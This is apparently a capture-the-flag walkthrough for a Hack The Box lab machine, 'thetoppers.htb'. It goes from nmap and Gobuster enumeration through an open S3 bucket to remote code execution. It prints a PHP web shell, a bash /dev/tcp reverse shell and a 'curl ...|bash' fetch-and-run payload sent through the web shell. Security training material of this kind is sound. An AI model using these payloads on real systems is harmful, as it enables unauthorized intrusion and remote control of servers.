First things first: Port scan, please exchange ip with the machines IP address.
sudo nmap -sV ip
Relevant output:
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
By pasting the IP address into a browser, a website will load. However if we try to open the website via the url "thetoppers.htb", which can be found on the CONTACT page (mail@thetoppers.htb), it would not work. So we modifiy our local hosts file:
sudo nano /etc/hosts
After the 127... entries, add your machines IP address and the url "thetoppers.htb", so it looks like this:
127.0.0.1 localhost 127.0.1.1 kali ip thetoppers.htb ...
Then hit ctrl + o and then enter to save the changes and ctrl + x to close the editor.
Now, when we paste the url "thetoppers.htb" into the browser, it still won't work. We need to add "http://" before. The now working url is
http://thetoppers.htb
Let's now search for available subdomains with Gobuster.
If you don't have the following wordlist installed yet, run
sudo apt install seclists
Then you can search for subdomains:
sudo gobuster vhost -u http://thetoppers.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain
The "--append-domain" is crucial, if you use Gobuster v3.2 and above! The relevant result is:
Found: s3.thetoppers.htb Status: 404 [Size: 21]
Let's also add this to the hosts file, like we did before. The hosts file looks something like this now:
127.0.0.1 localhost 127.0.1.1 kali ip thetoppers.htb ip s3.thetoppers.htb
We can confirm that everything works so far, by pasting "http://s3.thetoppers.htb" into the browser. The result should be:
{"status": "running"}
Now it's time to install the AWS CLI and connect to the s3 bucket.
sudo apt install awscli
Then, we need to configure aws
aws configure
And type in any string. It does not matter what, because those keys are not actually checked. I used "temp".
Let's list any s3 bucket available:
aws --endpoint=http://s3.thetoppers.htb s3 ls
Expected output:
2023-05-21 02:40:47 thetoppers.htb
Let's list the content of the s3 bucket:
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
Expected output:
PRE images/ 2023-05-21 02:40:47 0 .htaccess 2023-05-21 02:40:47 11952 index.php
Let's create a local shell.php file with the following content:
<?php system($_GET["cmd"]); ?>
Now we will upload this script to the s3 bucket.
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb
Expected output:
upload: ./shell.php to s3://thetoppers.htb/shell.php
To confirm it's uploaded, run this command again:
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb
The shell.php file should be listed there. We can also go to our browser and paste this url:
http://thetoppers.htb/shell.php?cmd=id
Expected output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Finally we can get the reverse shell. Let's request the inet ip of tun0:
ifconfig tun0
The relevant output is (ip being the IP address you need):
inet ip
Create a local shell.sh file and paste the content, exchanging ip with your ifconfig tun0 inet ip value:
#!/bin/bash sh -i >& /dev/tcp/ip/443 0>&
And start listening on port 443 (more stealthy than port 1337) with ncat:
sudo nc -lvnp 443
Expected output:
listening on [any] 443 ...
In a new terminal window, start a webserver to host our reverse shell script
python3 -m http.server 8080
Expected output:
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
Now, paste this url into your browser (exchange ip with the IP address you got from "ifconfig tun0".
http://thetoppers.htb/shell.php?cmd=curl%20ip:8080/shell.sh|bash
In the ncat terminal window, a new output should appear, including something like this:
onnect to [10.10.14.131] from (UNKNOWN) [10.129.133.141] 39378 sh: 0: can't access tty; job control turned off
by running
id
The terminal output should be
uid=33(www-data) gid=33(www-data) groups=33(www-data)
So, it works! Let's get the flag. Type in
cd ..
To navigate to the directory /var/www. Then run
cat flag.txt
To output the flag!